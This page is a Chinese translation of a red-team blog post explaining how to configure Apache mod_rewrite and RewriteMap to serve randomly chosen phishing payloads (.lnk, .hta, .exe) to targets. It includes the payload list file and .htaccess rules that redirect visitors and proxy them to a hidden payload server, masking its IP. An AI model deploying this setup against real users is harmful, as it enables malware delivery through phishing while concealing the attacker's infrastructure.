當前位置:
首頁 > 新聞 > 使用 apache mod_rewrite 方法隨機提供 payloads

使用 apache mod_rewrite 方法隨機提供 payloads

本文中講述的方法更適用於真實滲透測試環境中,因為電子郵件釣魚往往是威脅到整個公司,而不是只威脅到紅隊的測試環境。因為電子郵件釣魚具有高針對性,並且手動設置攻擊載荷對攻擊來說也是很麻煩的。所以請閱讀這篇文章,我會通過設置一個apache重定向器或者直接設置一個伺服器,通過RewrieMap從預定義的攻擊payload列表中隨機選取payload進行提供。

apache中RewriteMap方法允許外部的程序比如腳本,資料庫,文本文件等映射到伺服器內部。在官方文檔中使用最多的例子:如果一家網店的url結構想從item-1234到iphone-7-white,那麼網站管理員無需更改任何硬編碼的代碼,只需當訪問item-1234時,apache來提供iphone-7-white這一url。RewriteMap提供了大量修改這些資源的方法。我們會使用RewriteMap從一個文本文檔中提取的payload轉換為URI,並且當被訪問時,進行302跳轉,使目標能夠訪問到我們隨機的payload文件。

下圖就是攻擊的主要內容:

環境配置

apache環境需要更改一些設置以便伺服器環境支持mod_rewrite以及RewriteMap方法。這些設置的詳細信息都在我之前的一篇文章中寫過。長話短說,打開位於/etc/apache2/的apache2.conf文件,通過增加以下代碼重寫htaccess文件:

Options Indexes FollowSymLinks

AllowOverride None

Require all granted

如果你的重定向器的網站根目錄不是默認的/var/www,你需要去更改一下AllowOverride的響應目錄。

在配置伺服器的文檔中,我們需要在底部添加:

RewriteMap payloads "rnd:/var/www/payloads.txt"

這一行代碼就告訴mod_rewrite方法,當我們使用RewriteMap調用payload變數時,就會從/var/www/payloads.txt提取。apache用戶必須具有讀取這一文件的許可權。並且應該儲存在web根目錄之外,比如在這個例子中,就是在/var/www/html目錄之外。

創建/var/www/payloads.txt文件,並且在文件中寫入如下內容:

windows payload.lnk|payload.hta|payload.exe

上述代碼中windows就是觸發的key,以及payload.link,payload.hta,payload.exe則是變數。當RewriteMap函數被調用時,此時就會提供windows這個Key,然後通過管道符號分割的變數就會隨機選取一個。我們可以增加多次payload名字,以便它可以更大概率的輸出。這個文件可以立即更新,所以修改這個文件之後無需重啟apache服務。如果你確定有的payload不起作用了,你完全可以在payload.txt中刪除。

通過以下命令開啟依賴的mod_rewrite模塊,重啟apache服務。

a2enmod rewrite proxy proxy_http && service apache2 restart

啟動的最後一步就是創建htaccess文件,比如在/var/www/html/.htaccess文件寫入如下內容:

RewriteEngine OnRewriteCond % ^/payload/?$

RewriteRule ^.*$ /$ [L,R=302]

RewriteCond % ^/payload.(exe|lnk|hta)

RewriteRule ^.*$ http://192.168.188.134% [P]

以下是規則的詳細劃分:Enable the rewrite engine

If the request』s URI starts with 『payload』 with an optional trailing slash at the end of the URI,

rewrite the entire request to a random value pulled from the RewriteMap file linked to "payloads" with the key "windows" This is a temporary redirect and the last rule that should be evaluated/applied to the request.

If the request』s URI starts with 『payload』 and ends with the file extension exe, lnk, or hta,

rewrite the entire request to serve the request URI from IP 192.168.188.134 (the payload server IP), and keep the user s address bar the same (obscure the teamserver s IP).

現在,服務端已經完全配置好了。

當用戶連續兩次訪問http://spoofdomain.com/payload時,第一次會提供可執行文件,第二次會提供html 應用程序(HTA)。

GIF/313K

Apache mod_rewrite為滲透測試人員以及紅隊提供了豐富的選擇,這一方法加強了他們的攻擊範圍以及釣魚攻擊的成功率。這個技術可以和別的技術結合起來,會獲得更大的效果。用戶點擊後可以儘可能的收集更多的信息。

文章翻譯自

https://bluescreenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite/

點擊展開全文

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

開創一個安全極智的未來
CIA 曾經做過一套黑客工具,可以破解數百款品牌路由器
揭秘中國網路虛假新聞「製造器」,看傳播者如何操縱操縱大眾輿論?
都說印表機不安全,那究竟有多少種黑掉它的姿勢呢?
網路攝像頭的地盤爭奪戰:四款殭屍軟體的技術解析

TAG:嘶吼RoarTalk |

您可能感興趣

Unit 5 Geophysical Methods of Exploration 地球物理勘探方法
python開發利器,python shell和vim中都需要的tab補全方法
解決Electra越獄顯示Error:topanga錯誤的方法!
殭屍毀滅工程steam is not enabled錯誤解決方法
jQuery UI API 類別-方法重載(Method Overrides)
受AlphaGo啟發,AI重建量子系統新方法登上Nature Physics
Acta Neuropathol Commun:科學家們開發出診斷神經退行性疾病的新方法
教程 | 5種快速易用的Python Matplotlib數據可視化方法
CodeWarrior IDE使用Tips-使用burner將elf文件轉換生成HEX和BIN文件的方法和步驟詳解
絕地求生大逃殺BattlEye Launcher 998解決方法
蘋果iPhone打開簡訊iMessage就死機怎麼辦?附解決方法
jQuery UI 小部件(Widget)方法調用
jQuery UI API 類別-方法(Methods)
requests 庫的常用方法
Ray Dalio的思考方法
DeepMind於Nature子刊發文提出非對稱博弈的降維方法
staxel手柄怎麼設置 staxel手柄設置方法
MyBatis使用筆記——原始方法開發dao層
小小噩夢Fatal error問題解決方法
Python之re模塊方法詳解